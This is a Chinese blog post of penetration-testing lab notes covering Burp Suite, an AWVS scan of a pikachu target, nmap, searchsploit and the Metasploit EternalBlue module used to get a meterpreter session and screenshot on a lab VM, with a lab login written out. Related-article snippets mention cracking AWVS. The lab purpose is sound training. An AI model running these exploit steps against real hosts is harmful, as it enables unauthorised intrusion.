2021-07-25

最新推荐文章于 2022-04-22 11:38:16 发布
最新推荐文章于 2022-04-22 11:38:16 发布
阅读量121 收藏
点赞数
文章标签: 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339660/article/details/119082214
版权

Burp Suite实验
安装Burp Suite,并打开,单击burp suite中的proxy,并把intercept is off点击为灰色;打开火狐浏览器,看到有一个小狐狸图标,就可以上网了。
在这里插入图片描述
在这里插入图片描述
一.搭建PHPweb测试环境
在这里插入图片描述
在这里插入图片描述

二.搭建pikachu靶机环境

三.使用AWVS扫描pikachu靶机环境,生成漏洞报告
在这里插入图片描述
四.先导入blue虚拟机,开机登陆:用户:administrator 密码:panshi123qwE
将网路配置成NAT模式

五.查看ip地址

六.修改网卡模式为DHCP
在这里插入图片描述
七.端口探测
nmap -sC -sV -p445 192.168.92.129 --min-rate=2000
在这里插入图片描述
八.搜索可利用漏洞以及POC
searchsploit ms17-010 搜索关键词,查找漏洞

输入searchsploit smb

在输入searchsploit apache

九.locate linux/remote/34.pl 搜索脚本存在的位置

在这里插入图片描述
十.search ms17-010 搜索关键词
结果中发现:exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述
十一.使用use exploit/windows/smb/ms17_010_eternalblue (可以简写 use 0)
在这里插入图片描述
退出back
在这里插入图片描述
show options 查看配置项目
在这里插入图片描述
set rhosts 192.168.232.129 配置目标IP
在这里插入图片描述
run运行
在这里插入图片描述
我们发现获取了一个session 以meterpreter 开头的命令行工具
background 返回框架控制台
在这里插入图片描述
sessions 查询当前连接的目标
在这里插入图片描述
sessions 1 连接某一个远程主机
在这里插入图片描述
screenshot 截屏功能(注意,需要在meterpreter,命令行下进行操作)root/lmNXLFKT.jpeg
在这里插入图片描述
新建kali 打开文件所在位置
在这里插入图片描述
下载到本机桌面
在这里插入图片描述
在这里插入图片描述

佩琪~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试攻击推荐之Burp Suite 从入门到放弃……
Anprou的博客
10-14 3708
一站式自动化检测系统安全问题。
Awvs+burp+xray,全自动漏洞探测
m0_60571990的博客
11-29 1159
Awvs+burp+xray,全自动漏洞探测
AWVS 网页漏洞扫描工具安装使用(Linux)
Goodric的博客
05-23 2925
AWVS( Acunetix Web Vulnerability Scanner) 是一款知名的Web网络漏洞扫描工具,通过网络爬虫测试你的网站安全,检测流行安全漏洞。 安装包是下载这个文件 :acunetix_trial.sh (网上应该比较多) 破解文件是: patch_awvs (GitHub 下载地址:patch_awvs文件下载 我这里演示的是在 kali 机下安装,如果在 Ubuntu 下安装据说还要下载一下依赖包。 把安装文件和破解文件的压缩包复制到 kali 的文件夹下。 (有的说只能拖到文
Burpsuite实验一
weixin_30371875的博客
11-06 308
一.实验准备 win7系统 burpsuite 二.实验目的 进行重放攻击,观察结果 三.实验内容 本次实验并没有采取在虚拟机下进行,而是直接在win7系统中进行。首先配置一下环境,选择你常用的浏览器,浏览器配置大同小异,推荐火狐,或者ie,不推荐Google chrome。(我尝试用谷歌浏览器,发现配置代理的时候并不能抓到包,具体原因暂时不明。) 首先找到火狐的设置界面,如...
初步熟悉掌握使用burpsuit(作业)
qq_43473164的博客
03-17 705
burpsuite暴力破解 burpsuite是黑客攻击网站的工具集成软件。最为简单的就是对账号密码的暴力破解,burpsuite暴力破解功能分为四类(1)狙击手(sniper) (2)破城锤(Brttering ram)(3)音叉(Pitchfork)(4)集束炸弹(Clusterbomb),其中最为常用的是狙击手和集束炸弹,狙击手是已知账号密码其中一个,对另一个进行准确的暴力破解。集束炸弹是在...
美国锂电池2021-2030年国家蓝图[2021-07-19](25页).pdf
05-21
"美国锂电池2021-2030年国家蓝图" 美国锂电池2021-2030年国家蓝图是美国能源部 secretary Jennifer M. Granholm 于2021年6月发布的一份报告,旨在推动美国锂电池制造业的发展,解决气候危机,实现净零排放目标。本...
Serial-COM25_2021-04-04_14-37-43.log
04-04
Serial-COM25_2021-04-04_14-37-43.log
PothosSDR-2021.07.25-vc16-x64.exe
09-28
LimeSDR公司荣誉出品-开源SDR集成软件”PothosSDR”-内置“gqrx”(包括windows版本),GNU radio以及CubicSDR。
2021-2002年中国省级环境污染治理投资数据.rar
最新发布
04-03
南开管理评论:1-25[2022-07-08].! s8 j c2 q; i, H- F, c+ B- N" t! l9 X( h+ o7 j; d8 x [2]郭凌军,刘嫣然,刘光富.环境规制、绿色创新与环境污染关系实证研究[J].管理学报,2022,19(06):892-900+927. [3]王孝松,田...
电机学PPT-2021.07.25.rar
07-25
电机学PPT-2021.07.25.rar
科技前沿与工程前沿-2021.07.25.rar
07-25
科技前沿与工程前沿-2021.07.25.rar
algorithm-notes
03-28
25查看链接列表2021-03-24审查树2021-03-23审查树2021-03-22审查树2021-03-21审查树2021-03-20复查二元搜索2021-03-19堆种类2021-03-18大批DP2021-03-17DP2021-03-16DP2021-03-15DP2021-03-14DP2021-03-13DP2021-03-...
bing-wallpaper:必应每日超清壁纸(4K)
03-05
2021-02-25 2021-02-24 2021-02-23 2021-02-22 2021-02-21 2021-02-20 2021-02-19 2021-02-18 2021-02-17 2021-02-16 2021-02-15 2021-02-14 2021-02-13 2021-02-12 2021-02-11 2021-02-10 2021-02...
2021-2022计算机二级等级考试试题及答案No.4543.docx
11-01
19. 内存变量类型:在Visual FoxPro中,`^2001-07-28 10:15:20 PM`是日期时间型(D),`.T.`是逻辑型(L),`$123.45`是货币型(M),`123.45`是数值型(N),`"123.24"`是字符型(C)。 20. 自动批处理文件:自动...
2021-2022计算机二级等级考试试题及答案No.3440.docx
11-01
24. Java整型常量:Java整型常量不能包含前缀`078`的八进制数,因为八进制数的前缀是`0`而不是`07`。 25. 完整计算机系统:包括硬件系统和软件系统两部分,选项B正确。 26. 算法的定义:算法是解题方案的准确而...
Burp Suite使用详解
热门推荐
myths_0的专栏
02-15 2万+
http://www.nxadmin.com/tools/689.html 本文由阿德马翻译自国外网站,请尊重劳动成果,转载注明出处 Burp Suite是Web应用程序测试的最佳工具之一,其多种功能可以帮我们执行各种任务.请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,执行会话令牌等多种的随机性检查。本文将做一个Burp Suite完全正的演练,主要讨论它的
Burpsuite实验(二)
weixin_30845171的博客
11-07 192
一。这次我们使用一下burpsuite的代理拦截功能。 图中的proxy是代理的选项,其中intercept是拦截的功能,在浏览器中请求的包,都经过它。 这是打开拦截时候的状态。forward是通过此包,drop是丢掉此包。如果你点击drop,就会出现如下画面。 这是由burpsuite返回的结果,不经由服务器。 二。我们现将拦截关掉,方便进入网页,不用一个一个的同意。 随便...
AWVS批量扫描-妈妈再也不用担心我不会用awvs批量扫描了
白帽子九一
04-22 7669
详细信息:https://www.acunetix.com/blog/news/acunetix-v13-release/ 直接下一步安装就可以了; 1、wvsc.exe覆盖到“C:\Program Files (x86)\Acunetix\13.0.200205121\ 2、license_info.json覆盖到“C:\ProgramData\Acunetix\shared\license” 然后记得点击属性改成只读。 下载地址: windows:https://pan.baidu.com/s/1sPE
菜鸟日记之awvs扫描器扫描web漏洞
Blazar_star的博客
10-31 2281
立个flag,这个月跟着实验吧做实验掌握基础。 ---- ------------今天的分割线------- ---- ------------- 今天是10月30号星期二。从昨天得知实验吧这个平台,到昨晚的梦里都是关于网络安全的各种。 终于,我可以更高一层去接触和了解网络安全。谨此博客记录我与网安的这些个相识相知的日子。 -----------------今日主题awvs扫描器-----...
.net判断"2021-03-07 21:25"是否是今天
05-25
DateTime dateTime = DateTime.ParseExact("2021-03-07 21:25", "yyyy-MM-dd HH:mm", CultureInfo.InvariantCulture); // 获取今天的日期 DateTime today = DateTime.Today; // 判断日期时间是否是今天 bool is...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值